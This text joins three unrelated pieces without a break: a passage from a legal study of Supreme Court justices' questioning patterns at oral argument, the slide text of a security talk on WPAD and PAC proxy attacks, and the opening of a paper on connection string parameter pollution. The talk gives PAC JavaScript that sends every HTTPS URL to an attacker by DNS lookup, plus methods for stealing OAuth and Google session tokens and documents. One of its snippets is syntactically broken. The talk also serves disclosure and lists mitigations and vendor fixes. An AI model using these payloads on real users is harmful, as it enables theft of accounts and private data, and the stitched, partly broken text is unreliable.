classes, therefore, based on the identity of the last party to speak: the petitioner, the respondent, or a current fellow justice (questions asked to justices no longer on the court were excluded15). Cases for which either the justices’ voting records or the advocates’ roles (i.e., whether they appeared for the petitioner or the respondent) were not available were excluded 14 Compare, e.g., The Oyez Project, Altria Group v. Good , 555 U.S. ___ (2008) available at: (http://oyez.org/cases/2000-2009/2008/2008_07_562) (last visited Saturday, May 7, 2011) with The Oyez Project, Oregon v. Ice , 555 U.S. ___ (2009) available at: (http://oyez.org/cases/2000-2009/2008/2008_07_901) (last visited Saturday, May 7, 2011). 15 In retrospect, this may have been a mistake, because it tends to understate the value of justice-to-justice questions for justices with greater seniority on the court. The intent behind the decision was to avoid potential overstatement of the value resulting from arguments or dialogs with justices no longer present. -7- from the analysis, because it would be impossible to link the justices’ votes with whatever they did at oral argument. Anthony Kennedy Scorecard Cases During Tenure: 2057 Voted with the Majority: 1802 Voted with the Minority: 188 Did Not Participate: 65 Majority Opinions Authored: 214 Concurrences Authored: 192 Dissents Authored: 185 Joined Another Justice’s Opinion: 169 Discussion The perception of Justice Kennedy as a swing vote seems supported by the fact that he has voted with the majority in over 87% of the 2,057 cases heard by the Supreme Court since his appointment: as Justice Kennedy rules, so does the court. In a 5-4 decision, of course, each of the five votes in the majority is equally decisive– the changing of any would tip the outcome in the other direction. Justice Roberts, for example, has been with the majority in roughly the same percentage of the cases he has heard. The phrase “swing vote,” in the context of the Supreme Court, must therefore mean something more than “strongly correlated with the outcome of cases,” and must connote a vote that is less easy to predict on policy or ideological grounds. Of the 2,057 cases heard during Justice Kennedy’s time on the court, 734 were included in the oral argument study (i.e., there was complete information about the justices’ rulings in these cases, there was complete information about who represented each party, and Justice Kennedy said at least one thing in the course of the oral arguments). Over the course of those cases, Justice Kennedy spoke 8,753 times: 4,378 times to the petitioner, 3,837 times to the -8- respondent, and 438 times to another sitting member of the court. Along with Justice Ginsburg, he is a very even-handed questioner, with only a very slight bias in favor of speaking to the petitioner. He is also the court’s most even-handed writer of special opinions, balancing between 51% concurrences, and 49% dissents. Most justices lean in favor of writing dissents. This even-handedness carries through to the distribution of his questions at oral argument: even when the cases are grouped by the party for whom Justice Kennedy voted, no significant pattern emerges. Questioning Patterns by Vote Justice Kennedy has a slight tendency to ask more questions of the petitioner in cases where he votes for the respondent.16 This is not as reliable a metric with Justice Kennedy as it is with some other justices. For example, in Maryland v. Pringle, 540 U.S. 366 (2003), Justice Kennedy asked 20 questions of the petitioner and only one of the respondent, and voted for the petitioner. Likewise in NASA v. FLRA, 527 U.S. 229 (1999), Justice Kennedy voted for the respondent, having asked the respondent 19 questions and the petitioner only two. At least at this level of analysis, Justice Kennedy remains one of the most inscrutable members of the court: his questioning behavior at oral argument does not telegraph what his vote will be. 16 This will be a recurring trend: many justices tend to ask fewer questions of the party for whom they eventually vote. -9- Antonin Scalia Scorecard Cases During Tenure: 2230 Voted with the Majority: 1834 Voted with the Minority: 383 Did Not Participate: 13 Majority Opinions Authored: 229 Concurrences Authored: 341 Dissents Authored: 382 Joined Another Justice’s Opinion: 278 Discussion As the senior member of the court, Justice Scalia has the left the most abundant statistical trail. He stably in the majority (82.3%), and is a vigorous author of both dissents and concurrences. Like Justices Thomas, Ginsburg, Alito and Breyer, he has written more of each than he has majority opinions, and he is only barely in second place behind Justice Thomas among his fellow justices in terms of overall likelihood of submitting a written opinion in any given case (Justice Scalia has written in 671 of the 2213 cases in which he has participated, for a rate of 42.9%). Justice Scalia is also an enthusiastic participant in oral argument: in the 754 arguments considered for this analysis, he spoke 17,954 times, for an average of nearly 24 questions per argument. He shows a slightly stronger than average tendency to side with the petitioner (457 cases, or 60.6%). In cases where he votes for the petitioner, his questioning pattern at oral argument practically a precise mirror of his questioning in cases where he votes for the respondent. -10- Questioning Patterns by Vote Most of the justices are at least somewhat “antagonistic” in their questioning, in the sense that they tend to ask more questions of the party for whom they will not be voting. In a nutshell, the party who receives fewer questions from Justice Scalia at oral argument can have some degree of confidence in Justice Scalia’s support at voting time. With Justice Scalia, this is a more reliable indicator than it is for most other justices: in the 40 cases in which he asked more than 25 questions of the petitioner, he voted for the respondent only 10 times. Correspondingly, in the 40 cases in which Justice Scalia asked more than 27 questions of the respondent, he voted for the petitioner only 7 times. In the 67 cases where the questions were evenly distributed (i.e., less than a 2-question difference between questions asked of the petitioner and questions asked of the respondent), he voted for the petitioner 60 times (roughly 89.5%). As a result, it would seem that Justice Scalia’s vote can be inferred with some degree of confidence from the distribution of his questions at oral argument. Of course, Justice Scalia’s vote may generally also be predicted based on the content of his questions at oral argument, but in cases where his vote is in doubt, the distribution of questions might be a worthwhile metric for those seeking to handicap the court. -11- Clarence Thomas Scorecard Cases During Tenure: 1546 Voted with the Majority: 1230 Voted with the Minority: 298 Did Not Participate: 21 Majority Opinions Authored: 153 Concurrences Authored: 222 Dissents Authored: 296 Joined Another Justice’s Opinion: 283 Discussion Not much can be said about Justice Thomas’s speech patterns at oral argument. He has spoken in only 12 cases eligible for in this study, uttering a total of 37 questions. Although the balance is quite lopsided (30 of the 37 questions were asked of the respondent), even such a striking pattern should not be taken as a serious statistical indicator in a sample this small. In cases where Justice Thomas spoke, he voted for the petitioner 8 times (75%), but again, that apparent bias may not be indicative of anything in particular. Justice Thomas’s silence at oral argument is countered, however, by his outspokenness in the written word: he has written an opinion of some sort (whether majority, concurrence, or dissent) in 671 of the 1,525 in which he has participated (44%), making him the court’s leader in terms of likelihood of submitting a written opinion in any given case. -12- Elena Kagan Scorecard Cases During Tenure: 34 Voted with the Majority: 10 Voted with the Minority: 4 Did Not Participate: 20 Majority Opinions Authored: 3 Concurrences Authored: 0 Dissents Authored: 2 Joined Another Justice’s Opinion: 5 Discussion Thus far, Justice Kagan’s record with the court is remarkable mostly for the number of cases in which she has not participated: she has recused herself in 58% of the cases heard between the time she ascended to the bench and the time when the data for this study were collected. Of the 14 cases she has heard, only 13 were eligible for inclusion in the oral argument study. As the court’s newest member, there is not yet much data to go on, but her behavior thus far is different from that of her fellow justices. In the first place, she has voted for the respondent in eight of the 13 cases studied: most justices, and the court as a whole, show at least a moderate statistical preference for the petitioner. Second, Justice Kagan tends to ask more questions of the petitioner regardless of what her vote turns out to be: in only three cases has she asked more questions of the respondent. While it is obviously too early to claim that these trends are in any way significant, it is interesting to note that Justice Kagan is bucking the court’s trends, at least at the outset of her tenure. As a final footnote, the fact that Justice Kagan has such a high rate of non-participation in cases has had an interesting side-effect: even though there are only 10 cases in which she has voted with the majority, she has written three majority opinions. This is well over twice the rate experienced by her more senior colleagues, and it shows an amusing -13- (if predictable) dynamic in assignments: the fewer cases in which one participates, the more likely one will have to write the court’s opinion in those cases where one sides with the majority. John G. Roberts, Jr. Scorecard Cases During Tenure: 325 Voted with the Majority: 285 Voted with the Minority: 27 Did Not Participate: 7 Majority Opinions Authored: 38 Concurrences Authored: 17 Dissents Authored: 25 Joined Another Justice’s Opinion: 33 Discussion Justice Roberts spoke at oral argument in 265 cases suitable for inclusion in this study. In the cases examined, Justice Roberts voted for the petitioner 173 times (65%), and for the respondent 93 times (35%). He has asked a total of 2,475 questions of petitioners (an average of 9.34), 2,777 questions of respondents (an average of 10.48), and 166 questions of his fellow justices. These are not distributed evenly, however. Questioning Patterns by Vote In other words, in cases where Justice Roberts votes for the respondent, he asks an average of 11.1 questions of the petitioner (and 9.66 of the respondent), and in cases where he votes for -14- the petitioner, he asks an average of 10.9 questions of the respondent (and of the 8.4 of the petitioner). These numbers support the theory that, statistically speaking, Justice Roberts has a mildly antagonistic questioning style: he tends to ask more questions of the party against whom he will vote. This is a weaker correlation than we have observed with other justices, however. Additionally, Justice Roberts sides with the majority in just over 90% of his votes. Surprisingly, this is slightly higher than Justice Kennedy’s percentage. The number of questions Justice Roberts asks of each party is therefore at least weakly correlated with the outcome of the case. Obviously, this does not establish any sort of causative relationship: one could not hope to win a case merely by confining one’s oral argument to topics unlikely to draw questions from Justice Roberts. Nevertheless, litigants seeking to divine the outcome of their cases after oral argument may wish to count the questions Justice Roberts asks of each side. Ruth Bader Ginsburg Scorecard Cases During Tenure: 1326 Voted with the Majority: 1055 Voted with the Minority: 270 Did Not Participate: 1 Majority Opinions Authored: 140 Concurrences Authored: 143 Dissents Authored: 257 Joined Another Justice’s Opinion: 275 Discussion Justice Ginsburg has been on the court for a total of 1,341 cases (as of this data collection), in that entire time, there has only been one case in which she did not participate,17 and she has spoken at least once in every single argument in which she has participated. Over 17 Federal Election Commission v. NRA Political Victory Fund, 513 U.S. 88 (1994) -15- the cases included in this analysis, she voted for the petitioner 431 times (57.8%), and for the respondent 315 times (42.2%). This pattern places her more or less precisely in harmony with the court’s overall tendency to side slightly with the petitioner (see the “Case Outcomes” discussion in the “Court as a Whole” section, below). Justice Ginsburg has asked a total of 10,501 questions, of which 5,382 (51.2%) were for the petitioner, 4,818 (45.8%) were for the respondent, and 301 (2.9%) were for a colleague on the court. On the whole, she is an even-handed questioner, but when she votes for the respondent, she has a tendency to pepper the petitioner with questions. Questioning Patterns by Vote This is not a wholly trustworthy indicator, however: there are 76 cases in which she asked no questions whatsoever of the respondent, but in those cases she still cast her vote for the petitioner 40 times (including seven cases in which she asked more than 10 questions of the petitioner). Still, if we calculate the ration of petitioner questions to respondent questions for each case, when the ratio is greater than 5-1, she has voted for the petitioner only 23.7% of the time. As a general rule, it seems impossible to infer much about Justice Ginsburg’s vote on the basis of her speaking at oral argument. However, as the ratio of the number of questions Justice Ginsburg asks of the petitioner at oral argument to the number of questions she asks of -16- the respondent increases, the probability of her voting for the petitioner decreases, settling just below 25% for extreme values. Samuel A. Alito, Jr. Scorecard Cases During Tenure: 304 Voted with the Majority: 238 Voted with the Minority: 37 Did Not Participate: 21 Majority Opinions Authored: 29 Concurrences Authored: 31 Dissents Authored: 33 Joined Another Justice’s Opinion: 33 Discussion Of the 207 oral arguments eligible for inclusion in this study, Justice Alito voted with the petitioner 114 times (55%), and in his time on the court overall, he has voted with the majority 78% of the time, making him a centrist, in terms of the court’s overall tendency to side slightly in favor of the petitioner. He spoke at oral argument 1,295 times (an average of six questions per case). Like Justice Scalia, the pattern of Justice Alito’s allocation of questions between the petitioner and respondent is an almost perfect mirror image, depending on which party he eventually votes for, with the party that receives his vote being asked fewer questions. Questioning Patterns by Vote -17- Thus, in cases where Justice Alito voted for the petitioner, the 39.5% of his questions went to the petitioner, 58.5% to the respondent, and the remaining 2% to his fellow justices. In cases where the respondent got Justice Alito’s vote, 59.5% of his questions went to the petitioner, 37.4% to the respondent, and the remaining 3.1% to his fellow justices. This is a less reliable indicator for Justice Alito than it is for Justice Scalia, at least when votes for the respondent are concerned. In cases where Justice Alito asked more questions of the petitioner, he still voted for the petitioner 43.7% of the time; in cases where Justice Alito asked more questions of the respondent, on the other hand, he only voted for the respondent 35.1% of the time. Sonia Sotomayor Scorecard Cases During Tenure: 103 Voted with the Majority: 78 Voted with the Minority: 18 Did Not Participate: 3 Majority Opinions Authored: 12 Concurrences Authored: 8 Dissents Authored: 13 Joined Another Justice’s Opinion: 24 Only 85 cases from Justice Sotomayor’s tenure on the court were eligible for inclusion in this study. In those cases, she voted for the petitioner 52 times (61.2%), and for the respondent 33 times (38.8%). As was the case with Justice Ginsburg, Justice Sotomayor tends to ask more questions of the petitioner in cases where she votes for the respondent. -18- Questioning Patterns by Vote In contrast to Justice Ginsburg, however, there is no clear trend. Justice Sotomayor is liable to vote either way, regardless of the ratio of petitioner questions to respondent questions. In the five cases where she asked the petitioner 15 or more questions and the respondent zero, she voted for the petitioner three times. In the 21 cases where she asked the petitioner more than 10 questions, she voted with the petitioner nine times (or 42.8%). Possibly some more useful pattern will emerge over time, but at the moment, the best we can say is that in cases where she asks more than 20 questions of the petitioner, it is likely that Justice Sotomayor will vote for the respondent. The converse is not necessarily true: in Wood v. Allen, 558 U.S. ___(2010), Justice Sotomayor asked no questions of the petitioner, but spoke 22 times during the respondent’s argument and still voted for the respondent. -19- Stephen G. Breyer Scorecard Cases During Tenure: 1237 Voted with the Majority: 972 Voted with the Minority: 247 Did Not Participate: 16 Majority Opinions Authored: 124 Concurrences Authored: 150 Dissents Authored: 235 Joined Another Justice’s Opinion: 230 Discussion This analysis covered 716 of the 1237 cases heard by the Supreme Court during Justice Breyer’s tenure. In those cases, he has spoken a total of 12,892 times, for an average of 18 questions per case. Justice Breyer has voted with the majority in 78.6% of the cases in which he has participated. At oral argument, Justice Breyer’s distribution of questions is unique: 57.7% of his questions are directed at the respondent, and a mere 39.0% at the petitioner, despite the fact that he has voted for the petitioner in 64.9% of the cases available to this study. Nevertheless, his questioning is far less respondent-centric in cases where he votes for the respondent. Questioning Patterns by Vote Justice Breyer’s tendency to devote such a high percentage of his questions to the respondent, -20- regardless of his eventual vote, is unique among the pool of justices for whom there was enough data to study. In cases where he has voted for the respondent, just under half of his questions have been directed at the petitioner (49.7%). In the 435 cases where Justice Breyer has asked more questions of the respondent, he has voted for the petitioner 76.3% of the time, whereas in the 246 cases in which he asked more questions of the petitioner, he voted for the respondent 52.8% of the time. Thus, from a purely statistical perspective, although it is more likely that Justice Breyer will vote for the petitioner in any given case, that probability increases, the more questions he asks of the respondent. The Court As a Whole Knowledge of the patterns of the justices individually is more helpful when it is couched in the context of the behavior of the court as a whole. Being “in the majority” differs from case to case, for example, depending on whether, and how, the court’s votes are split. Likewise, knowing the tendency of a given justice to vote in favor of the petitioner is more helpful when compared to the court’s tendency as a collective. Case Outcomes As has been mentioned, the court shows a slight bias in favor of petitioners: petitioners prevailed in roughly 57% of the cases analyzed, as depicted in the figure below. Cases Resolved in Favor of Petitioner vs. Cases Resolved in Favor of Respondent This is most likely explained by the fact that litigants would not appeal to the Supreme Court if -21- they would reasonably expect to lose. Correspondingly, potential litigants might elect not to bring suit at all (or to settle, if they find themselves sued), rather than run the risk that the court might issue a rule that hamstrings their cause for all time. Decisional Patterns Over the course of the 2,371 cases studied here, the court has come out with 18 different decisional patterns, ranging from 9-0 to 3-3.18 Of these, only eight patterns amounted to more than 2% of the total caseload. Distribution of Decisional Splits The distribution of decisional splits remains relatively consistent on a year-by-year basis; there are some fluctuations in the relative frequencies of 5-4 and 7-2 splits, but the pattern is maintained roughly over time Relative Frequencies of Decisional Splits by Year 18 Reagan v. Abourezk, 484 U.S. 1 (1987). -22- The column for 2008 should be disregarded because, as mentioned above, Oyez did only a spotty job at recording case outcomes for that year: the information available appears to be correct, but it is incomplete. Other than that column, the only serious anomalies are the sudden surges of 8-1 decisions in 1987 and 2010. The 2010 group is explained by Justice Kagan’s high frequency of recusal, and the fact that not all of the court’s 2010 decisions have yet been published. In 1987, Justice Kennedy was new to the court, and did not participate in a similar series of decisions. There do not, in other words, appear to be many significant trends either in the harmony or the divisiveness of the court, and unanimous decisions are fairly consistently at least 30% of the court’s output. Concluding Thoughts The analysis presented here is interesting, but somewhat superficial– it would be technically feasible to dig much deeper. Potentially fruitful topics for further investigation include: • Are runs of multiple consecutive questions correlated with specific outcomes for any of the justices? • Is there a correlation between any of the justices’ votes and specific decisional split patterns (are there, for example, signs in the oral -23- argument questioning patterns that point to whether or not a case will be decided unanimously)? • Except for Justice Thomas, does a justice’s silence at oral argument signal anything about his or her probable vote? • Do certain justices tend to engage in dialog with one another, and if so, does that correlate with any particular pattern in their voting? The answers to all these questions lie within the data already collected,19 but answering them would be complex. As it stands, even having done only relatively simple investigation, we are able to spot several justices whose behavior at oral argument may reveal something about how they are likely to vote. Specifically, Justices Breyer, Alito, Ginsburg, and Scalia all exhibit questioning patterns that correlate with their votes; Justice Roberts does as well, but to a weaker extent. Possibly the same will be true of Justice Sotomayor, as she develops a deeper history with the court. There has not been enough chance to observe Justice Kagan in action to say whether she will be at all predictable via this method. The only two justices who appear not to leak information about their leanings at oral argument are Justice Thomas, who remains silent, and Justice Kennedy, whose questioning pattern is largely inscrutable. Of course, in many instances, it may be obvious how a given justice may vote, based on the justice’s record, or the nature of the questions asked at oral argument. This research has never set out to supplant standard legal analysis techniques. Reasonable minds differ on how the court will find in any given case, and the goal of this research is to see if by relying on tools outside of the usual lawyer’s arsenal, we can provide additional support for a proposed outcome. These techniques are presumably of limited utility to advocates: in the heat of 19 Others, such as the question of whether any of the justices behave differently at oral argument in civil cases than they do in criminal cases, or whether certain justices tend to treat cases from specific circuits differently would require the collection of additional data. -24- oral argument, it’s unlikely that there is anything to be gained by counting questions. They may be of some help to corporate litigants, however, who could take steps to insulate themselves from the effects of a forthcoming decision in the time after oral argument, if they had better insight into what that ruling might be. Most likely, these tools will be of interest to primarily to court-watchers and handicappers. In making a more nuanced estimation of the court’s vote in a given case, the first step is to count any “sure” votes, using traditional policy-based reasoning. Next, one would tally up the questions asked at oral argument, and check to see if patterns exhibited by the justices already counted undermined the certainty of their vote. If so, discount the certainty of their vote by some percentage. Finally, if any of the remaining justices are among those known to hint at their votes by their behavior at oral argument, use the question tally to predict the probability of their votes, remembering to factor in their degree of petitioner-bias. At this point, enough justices should have probabilities assigned to them that it is possible to estimate the odds of the ultimate outcome. The dominant strategy for predicting Supreme Court outcomes relies, understandably, on traditional expertise about the court and the cases in question. Other strategies exist. The “Fantasy SCOTUS” league,20 for example, endeavors to harness the collective thoughts of its various players. Prediction based on historical data is another valid source of input, and if our goal, in the end, is to make more accurate predictions about future cases, we should be open to incorporating whatever tools can help us accomplish this. This paper demonstrates the feasibility of providing support for inferences about case outcomes from oral argument data using homegrown information collection and analysis tools.21 20 http://www.fantasyscotus.net (last visited May 12, 2011) 21 Copies of these tools are available upon request; unfortunately, including the code as an appendix would have more than doubled the length of the paper. -25-
Toxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity Alex Chapman @noxrnet Paul Stone @pdjstone Introduction Our Talk Exciting introduction Some history – SSL, PAC, WPAD, sslstrip, HSTS The PAC Attack – bypassing HTTPS – Sniffing your traffic – Stealing your data – Stealing your accounts The VPN Attack – bypassing VPNs Mitgations Fixes Rogue Access Point Attacks Techniques in this talk assume an attacker on the local network, e.g. – Open WiFi network – Attacker on a corporate network – Compromised router Can intercept and modify all non encrypted traffic Can carry out local-network attacks on victims First there was no encryption Sure, why not – it’s 1993! Then there was SSL Problem: No encryption for sensitive websites Solution: Opt-in encryption, certificates to verify domain ownership Netscape 2 ships with SSL in 1995 Users somewhat safe from passive traffic sniffing attacks But SSL wasn’t perfect Many Problems: – Most websites allow connecting over HTTP and HTTPS – Most people connect over HTTP first, site redirects to HTTPS – Evil MITM can prevent user reaching HTTPS site Solution: ??? sslstrip released in 2009 - https://moxie.org/software/sslstrip/ – Man-in-the-middle HTTP proxy – Remove redirects to HTTPS – Rewrite HTTPS links to HTTP – Fetch HTTPS-only pages and serve as HTTP – User never actually reaches the real HTTPS site But SSL wasn’t perfect HSTS to the rescue! Problem: sslstrip broke HTTPS by just ignoring it Solution: force browser to always use HTTPS HTTP-Strict-Transport-Security header – 2010 – Removes vulnerable HTTP -> HTTPS redirect Strict-Transport-Security: max-age=31536000; includeSubDomains Proxy Auto-Config (PAC) Problem: Complex intranets require different HTTP proxies depending on which website you want to visit, e.g.: – proxyA.initech.corp for most intranet sites – proxyB.initech.corp for access to preprod sites – proxyC.initech.corp for public internet access Solution: JavaScript file to tell browser which proxy to use for each URL “Navigator Proxy Auto-Config File Format” - March 1996 – https://web.archive.org/web/20051202115151/http:/ wp.netscape.com/eng/mozilla/2.0/relnotes/demo/proxy- live.html Web Proxy Auto-Discovery Protocol (WPAD) Problem: Browser doesn’t work because a proxy is needed on network Solution: Browser/OS automatically gets proxy configuration from network “Web Proxy Auto-Discovery Protocol” - December 1999 – https://tools.ietf.org/html/draft-ietf-wrec-wpad-01 Router pushes PAC URL via DHCP option 252 DNS/ LLMNR / NETBIOS requests for wpad, wpad.internalcorp, wpad.corp etc… WPAD Attacks WPAD is a huge attack vector https://github.com/SpiderLabs/Responder Malicious network user can respond to WPAD requests, hijack traffic All clear-text traffic can be viewed, modified by attacker Can now inject browser 0-days, sslstrip etc.. Some remote WPAD attacks possible “Minimally, it can be said that the WPAD protocol does not create new security weaknesses.” – WPAD Spec WPAD Attacks in 2016 Windows has WPAD turned on by default (even in Home editions!) A local network attacker can tell the browser to use a malicious proxy that can sniff/inject traffic Fortunately, HTTPS and HSTS means traffic to many popular sites is fully encrypted sslstrip is a lot less effective than it was SRSLY?? Rejected talk title #1: Breaking WPAD New PAC Attacks How does a PAC script work? A typical PAC script: function FindProxyForURL(url, host) { if (host.indexOf('preprod.initech.corp') >= 0) return 'proxyB.initech.corp'; else if (host.indexOf('initech.corp') >= 0) return 'proxyA.initech.corp'; else return 'proxyC.initech.corp'; } http://tpsreports.initech.corp proxyA.initech.corp http://dev.preprod.initech.corp proxyB.initech.corp http://www.example.com proxyC.initech.corp PAC - FindProxyForURL PAC files must define a function called FindProxyForURL: function FindProxyForURL(url, host) { return 'DIRECT'; } where: url: the full URL being accessed. host: the hostname extracted from the URL. Browser will call: FindProxyForURL('https://foo.com/bar?x=y', 'foo.com'); PAC - FindProxyForURL PAC files must define a function called FindProxyForURL: function FindProxyForURL(url, host) { return 'DIRECT'; } where: url: the full URL being accessed. host: the hostname extracted from the URL. Browser will call: FindProxyForURL('https://foo.com/bar?x=y', 'foo.com'); PAC Functions http://findproxyforurl.com/pac-functions/ – alert – dateRange – dnsDomainIs – dnsDomainLevels – dnsResolve – isInNet – isPlainHostName – isResolvable – localHostOrDomainIs – myIpAddress – shExpMatch – timeRange – weekdayRange PAC Functions http://findproxyforurl.com/pac-functions/ – alert – dateRange – dnsDomainIs – dnsDomainLevels – dnsResolve These are interesting – isInNet – isPlainHostName – isResolvable – localHostOrDomainIs – myIpAddress – shExpMatch – timeRange – weekdayRange PAC - DNS Leak Remove / encode special characters in URL to allow leaking over DNS function FindProxyForURL(url, host) { if (url.indexOf('https' == 0) { var leakUrl = (url + '.leak').replace(/[^\w]+/gi, '.'); dnsResolve(leakUrl); } return 'DIRECT'; } https://example.com/login?authtoken=ABC123XYZ https.example.com.login.authtoken.ABC123XYZ.leak PAC – DNS Leaking Only a real vuln if it fits in a tweet: function FindProxyForURL(u,h){ if (u[4]=='s'){ dnsResolve(url+'.leak').replace(/[^A-Z0-9]+/gi,'.')); return 'DIRECT';}} The PAC attack - summary PAC files allow attacker-controlled JavaScript to see every HTTPS URL before it gets requested by the browser. The PAC file can leak data to an attacker via DNS HTTPS is meant to protect sensitive data on untrusted networks, but WPAD+PAC allows an attacker to do an end-run around HTTPS Rejected talk title #2: aPACalypse Now Passive Browsing demonstration Passive Attacks Searching Google, browsing Wikipedia and Facebook all happens 100% over HTTPS With the PAC leak we can sniff: – Search terms (as you type!) – All HTTPS pages visited Active Attacks Challenge: Steal as much sensitive data as possible using only URLs HTTP and HTTPS URLs, including path and query string × HTTP POST bodies × Cookies and headers × HTTP response bodies Limitations breed creativity! Web isn’t 100% HTTPS (yet) so we can inject content into non-HTTPS pages Active Attacks – 302 redirects Leak sensitive data via redirects from known to unknown URLs – https://plus.google.com/me/posts – 302 https://plus.google.com/<userid>/posts (or accounts.google.com if not logged in) – https://www.reddit.com/user/me – 302 https://www.reddit.com/user/<username> (or reddit.com/login if not logged in) Inject known URL via hidden image tag: <img src="https://facebook.com/me/" width=0 height=0> https.facebook.com.myuser.name is leaked via DNS Active Attacks – Blocking URLs Some redirects contain one-time auth tokens We want to use these on the ‘attacker’ side Must prevent them loading in the victim browser PAC script can do selective blocking of URLs: dnsResolve(escapedUrl) If (url.indexOf(‘authtoken’) > 0) return ‘nosuchproxy’; return ‘DIRECT’; Leak one-time URL to attacker Active Attacks - prerender(er)-ing pages We want to load a full webpage, but hide it from the user Traditionally hidden iframes were great for this: <iframe width=0 height=0 src="https://facebook.com"> but, most big sites disallow framing with X-Frame-Options Prerender “gives a hint to the browser to render the specified page in the background, speeding up page load if the user navigates to it.” http://caniuse.com/link-rel-prerender <link rel="prerender" href="https://facebook.com"> Supported by Chrome and Edge Active Attacks - prerender(er)-ing pages Load a known URL that fetches other, sensitive URLs All your Facebook and Google photos are publically accessible Served from CDNs, no cookies required If you know the right HTTPS URLs: https://scontent-lhr3-1.xx.fbcdn.net/v/t1.00/p206x206/10703974_10152242502 538_3345235623697056133_n.jpg?oh=15e8923d456d6748e644f1ca&oe=9CF5DA2A https://lh3.googleusercontent.com/x5gjakl6gC_av3fs3fa_y6cX-h367fsdaSF yFU5yE-yTW-Qp9Fe=w250-h250-p-k-nu <link rel="prerender" href="https://facebook.com/me/photos_all"> Some limitations, including: – Page load may get halted if it does a POST – Only one prerender page active at once Google Docs demonstration Google Docs Demonstration htdrive.google.com and googleusercontent.com cannot share cookies Auth tokens are passed via URL – so we can see them Load drive.google.com on victim side via prerender Find document IDs from image thumbnails Inject https://drive.google.com/uc?id=<docid>&export=download into victim browser and intercept redirect to googleusercontent.com with auth token Replay captured URLs on attacker side Attacker downloads documents How far can we take this? Google first-party SSO google.com will automatically log you into other Google domains, e.g. google.co.uk, blogger.com, youtube.com etc.. https://accounts.google.com/ServiceLogin? passive=true&continue=https://www.google.co.uk/ https://accounts.google.co.uk/accounts/SetSID?ssdc=1& sidt=<authtoken>&continue=https://www.google.co.uk Attacker steals this URL via DNS Now has authenticated session on google.co.uk 302 How far can we take this? Once on regional Google we can get: – Uploaded Photos – Gmail email summaries – Calendar Agenda – Get and set Reminders – Contact details – Full Location history screenshots OAuth An open protocol to allow secure authorization in a simple and standard method from web, mobile and desktop applications (oauth.com) OAuth 2.0 underlies many single sign-on (SSO) systems including: OAuth is flexible but most implementations allow exchanging tokens in URL parameters via 302 redirects So what? I use a VPN! VPNs allow data to travel safely over hostile networks via an encrypted tunnel to a trusted endpoint Should protect you on public Wifi VPN bypass Many VPN clients do not clear proxy settings obtained via WPAD Traffic is tunnelled between your machine and VPN endpoint Traffic is then tunnelled through WPAD proxy And then onto its destination VPN bypass – affected software Rejected talk title #3: VPN-emy of the State VPN demonstration So what? I don’t use Windows! The design specification of PAC and WPAD are so bad that multiple vendors independently implemented the same issues into various different products Chrome and Internet Explorer vulnerable by default on Windows Firefox, Android, OS X, iOS, Linux vulnerable, but only if explicitly configured with PAC (probably not that common) Windows is the only OS with WPAD turned on by default Mitigations 1. Turn off WPAD 2. No seriously, turn off WPAD 3. If you still need PAC: – turn off WPAD – configure an explicit URL for your PAC script – and serve it over HTTPS (or from a local file) Mitigations – VPN / WPAD Bypass VPN is safe from WPAD bypass if: – WPAD is disabled, or – VPN environment requires an HTTP proxy to reach Internet, or – VPN server pushes explicit proxy config to client The Good News, Vendor Fixes Context reported PAC issue to vendors on 3rd March 2016 OS X, iOS (and Apple TV!) – patched on 16th May (CVE-2016-1801) Google Chrome – Patched in Chrome 52 (CVE-2016-????) – https://bugs.chromium.org/p/chromium/issues/detail?id=593759 Android – patched, release date unknown (CVE-2016-3763) – https://code.google.com/p/android/issues/detail?id=203176 Firefox – patched, release due ??? – https://bugzilla.mozilla.org/show_bug.cgi?id=1255474 2016 – A bad year for PAC We’re not the first to spot this issue (but were the first to report it!) Crippling HTTPS with Unholy PAC - Amit Klein, Itzhak Kotler, (Black Hat USA 2016) Bas Venis (@BugRoast) reported the PAC leak to Google and Firefox (May 2016) Attacking Browser Extensions - Nicolas Golubovic (May 2016) – http://nicolas.golubovic.net/thesis/master.pdf (page 50) Can Web Proxy Autodiscovery leak HTTPS URLs? (May 2015) – http://security.stackexchange.com/questions/87499/can-web- proxy-autodiscovery-leak-https-urls Why did no-one spot this earlier? 1994 – SSL invented by Netscape 1996 – PAC invented by Netscape 1999 – WPAD invented by Microsoft (and others) 2009 – sslstrip and other HTTPS problems 2010… – HSTS implemented by browsers Google, Facebook, Wikipedia + many others go HTTPS by default 2016 – PAC HTTPS leak is reported and fixed PAC HTTPS leak VPN bypass worse things to worry about Summary A network based attacker can inject PAC script into browsers PAC scripts can leak all HTTPS URLs via DNS to an attacker We showed how to deanonymise users, steal OAuth tokens and access photos, location data and documents and other private data A VPN won’t necessarily protect you against a malicious proxy Questions
Connection String Parameter Pollution Attacks Chema Alonso1, Manuel Fernandez1, Alejandro Martín1 and Antonio Guzmán2 1Informatica64, S.L. 2Universidad Rey Juan Carlos 1{chema,mfernandez,amartin}@informatica64.com, 2antonio.guzman@urjc.es Abstract. In 2007 the ranking of the top ten critical vulnerabilities for the security of a system established code injection as the top 2, closely following top 1 XSS attacks. The first release candidate of the 2010 version of the ranking has promoted code injection attacks to top 1. Actually, the most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information. The potential damage associated with this kind of threats, the total absence of background and the fact that the solution to mitigate these vulnerabilities must be worked together with programmers, systems administrators and database vendors justifies an in-depth analysis to estimate all the possible ways of implementing this technique. Keywords: Code injection attacks, connection strings, web application authentication delegation. 1 Introduction SQL injections are probably the most known injection attacks to web applications by abusing its database architecture. Many different approaches and techniques have been studied and analyzed so far, and the published results conclude that to prevent these attacks from being successful, development teams need to establish the correct filtering levels on the inputs to the system. In the case of the attack presented in this paper, responsibility lays not only on developers, but also on system administrators and database vendors. This attack affects web applications, but instead of abusing implementation flaws in the way database queries are crafted, which is the most commonly found scenario on other injection attacks, it abuses the way applications connect to the database. According to OWASP [1], in 2007 the ranking of the top ten critical vulnerabilities for the security of a system established code injection attacks as the top 2, closely following top 1 XSS attacks. The first release candidate of the 2010 version of the ranking has promoted code injection attacks to top 1. Actually, the most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information. This is the case for the so-called connection string parameter pollution attacks. Potential impact of this type of vulnerability and the total absence of background justify an in-depth analysis to estimate all possible attack vectors using this technique. This paper is structured is in three main sections. The first is this short introduction where the foundations of the connection strings and existing mechanisms for the implementation of web applications authentication will be introduce. Section two proposes a comprehensive study of this new attack technique, with an extensive collection of test cases. The article concludes briefly summarizing the lessons learned. 1.1 Connections Strings Connection strings 